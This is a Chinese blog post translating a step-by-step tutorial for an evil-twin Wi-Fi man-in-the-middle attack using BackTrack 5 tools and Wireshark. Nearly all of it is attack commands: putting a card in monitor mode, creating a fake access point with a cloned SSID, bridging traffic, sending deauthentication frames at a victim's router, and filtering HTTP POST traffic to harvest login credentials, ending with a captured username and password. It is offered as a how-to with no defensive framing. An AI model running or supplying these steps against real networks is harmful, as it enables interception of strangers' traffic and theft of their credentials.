BT5 + wireshark玩wifi捕获和中间人攻击

最新推荐文章于 2021-09-02 08:00:00 发布

{丸の子}

最新推荐文章于 2021-09-02 08:00:00 发布

阅读量253

点赞数

分类专栏：网络安全文章标签：操作系统运维 php

本文链接：https://blog.csdn.net/waterseason/article/details/88334369

版权

网络安全专栏收录该内容

42 篇文章 0 订阅

订阅专栏

前言：先说明一下，这个文章不是我写的，是一个老外（Deepanshu Kapoor）安全专家写的，我一开始就是看着玩，但整个看完被老外那个细心和耐心给打动了，整个过程其实很简单，但是老外分了好多步骤来讲解，每个步骤都有配图和说明，甚至命令的参数都要解释一下。不得不佩服老外分享和奉献的精神，所以我也学着奉献一下，把它翻译成中文给大家看看吧，我尽量保持原汁原味，有不恰当的地方要原谅我，毕竟我不是专业翻译。（对原文PDF文档感兴趣的留邮箱，我发给你）

BT5 + wireshark玩wifi数据包捕获和session注入（中间人攻击）

介绍：

主要思路是通过伪造相同名称的wifi接入点，配合发送ARP数据包，攻击连入伪造wifi的用户。一个与原有wifi相同名称的伪造接入点一旦建立，会导致用户从原有链接中断开，并连入你所建立的伪造接入点中，因此所有的通信通道都会流经我的系统，届时我们通常会用session注入的方式拿到用户所有的细节/授信状态/信息等。

必备神器：


1，BT5（Backtrack操作系统）
2，虚拟机（带USB设备）
3，可联网的主机

第一步：

开BT5的terminal终端，然后输入”iwconfig” 检查无线网卡。

说明：iwconfig类似于ifconfig，但是是用于无线网络的。它经常被用来设置无线网卡的参数。
[img]http://dl2.iteye.com/upload/attachment/0126/4779/0354f9a1-3b7a-3cf0-9bbb-dd5e5a3e5cde.jpg[/img]
第二步：

输入“airmon-ng start wlan0”开启无线网卡。

说明：这个命令可以被用来让无线网卡处于监听状态。也可以被用来从监听模式中恢复成管理模式。输入 “airmon-ng”不带参数，可以显示网卡状态。

wlan0 是指wifi网卡。

wlan 是无线局域网， 0 是你的网卡编号。
[img]http://dl2.iteye.com/upload/attachment/0126/4781/d3bce181-fa90-3ce6-bee8-aa1f1147c888.jpg[/img]
第三步：

在网卡已经启动了监听模式后，输入“airodump-ng mon0”就可以开始抓包了。

说明：airodump-ng 可以用来抓802.11的原始帧数据包，特别适合于收集WEP的初始化向量用于aircrack-ng的破解。Airodump-ng也能够用来记录找到的接入点的坐标。

mon0在监听模式下和wlan0的意思是一样的。

一旦你把wlan0设置为监听模式，wlan0就要改为mon0。
[img]http://dl2.iteye.com/upload/attachment/0126/4783/235e6dfc-df21-3fc5-b728-2f409c31d9d7.jpg[/img]
第四步：

设置在airodump-ng中显示的频道ID，命令如下：


“iwconfig mon0 channel 5”    “iwconfig wlan0 channel 5”

或者


“iwconfig wlan0 channel 5”    “iwconfig mon0 channel 5”

说明：参数“channel”用来选定一个单独的特殊频道。
[img]http://dl2.iteye.com/upload/attachment/0126/4785/2a6ba5e9-7b1b-3ac3-9b1a-079db1a9a7cc.jpg[/img]
第五步：

现在开始建立你的伪造路由器，命令如下：


“airbase-ng - e “belkin.3448” mon0”

说明：airbase-ng是个多用途的工具，可针对AP（接入点）自身的客户端进行攻击，主要的思路是驱使客户端去连接伪造的AP，不是阻止客户端去连接真实AP。

“-e + SSID”指定伪造AP的SSID名称。
[img]http://dl2.iteye.com/upload/attachment/0126/4787/9062d987-c13a-3f9c-b207-fc9f8bb8e079.jpg[/img]
第六步：

现在是时候去“桥接”所有的网络了，命令如下：


“brctl addbr mitm” 
“brctl addif mitm eth0”
 “brctl addif mitm at0”

中间人就是<interface name> 。（这句话看原文直接翻译有些难以理解，实际上作者就是想说at0这个网卡架起来的网桥就是个中间人，攻击就是在这里完成的。—–译者注）

说明：

Brctl 用来在两个网卡之间建立桥接网络。

Addbr 用来添加网桥的对象，用<name>来指定网桥的名称。

Addif 给已经使用addbr创建的网桥中添加一个网卡，后边的参数使用你要添加的网卡名称即可。
[img]http://dl2.iteye.com/upload/attachment/0126/4789/fddc6bb7-eafc-32c9-bb53-269c13cfa4f0.jpg[/img]
第七步：

现在创建一个新的网卡配置，命令如下：


“ifconfig eth0 0.0.0.0 up”
 “ifconfig at0 0.0.0.0 up”

说明：ifconfig 不用多说了，用来配置网卡，大家经常用的。
[img]http://dl2.iteye.com/upload/attachment/0126/4792/d9e9b05d-35cc-33d0-9923-d4c39f035f7f.jpg[/img]
第八步：

现在可以启动我们用来做中间人攻击的网桥了！命令如下：


“ifconfig mitm up”

说明：配置完成的网桥可以使用ifconfig来启用。
[img]http://dl2.iteye.com/upload/attachment/0126/4794/157c694f-777d-3ba8-a060-40911738bfa8.jpg[/img]
第九步：

现在使用下面的命令发送认证包到路由器上，


“aireplay-ng - - deauth 0 - a 94:44:52:DA:B4:28 mon0”

说明：aireplay-ng 用来注入帧数据。

-a 指定被攻击者的BSSID。

94:44:52:DA:B4:28这个是被攻击者的BSSID。
[img]http://dl2.iteye.com/upload/attachment/0126/4796/1daeaa7d-963a-3b22-86ae-6404d7fb984d.jpg[/img]
第十步：

现在开始给被攻击者分配IP，命令如下：


“dhclient3 mitm&” 或者 “dhclient3 mitm &”

说明：

使用类似DHCP的协议方式分配IP。
[img]http://dl2.iteye.com/upload/attachment/0126/4798/add3ac47-0a0d-36bd-8c55-627e873a1300.jpg[/img]
第十一步：

现在你可以看看是不是有客户端已经连接上了，有的话会显示在第五步的那个命令终端里面。
[img]http://dl2.iteye.com/upload/attachment/0126/4800/a4bca1d0-bd9b-3ce1-bc8e-062378f4b7a0.jpg[/img]
第十二步：

开wireshark，命令：“wireshark&”

说明：wireshark是个网络协议抓包分析器。
[img]http://dl2.iteye.com/upload/attachment/0126/4802/6f41b092-5292-3ea6-b261-a57c52277c42.jpg[/img]
第十三步：

选择网卡，点开始（start）
[img]http://dl2.iteye.com/upload/attachment/0126/4804/979003a1-9a03-3dbd-bcf5-a93a73ea3b26.jpg[/img]
第十四步：

输入 “http contains POST”过滤一下，然后你就可以看到所有抓下来的数据包了。
[img]http://dl2.iteye.com/upload/attachment/0126/4806/d4ef858a-80b7-372f-b110-1f3454335b0f.jpg[/img]
http://exploit.deepanshukapoor.org/admin.php

Username – john

Password – 1234
[img]http://dl2.iteye.com/upload/attachment/0126/4808/6d22cea1-3ee2-352e-9a83-29af4a7f031f.jpg[/img]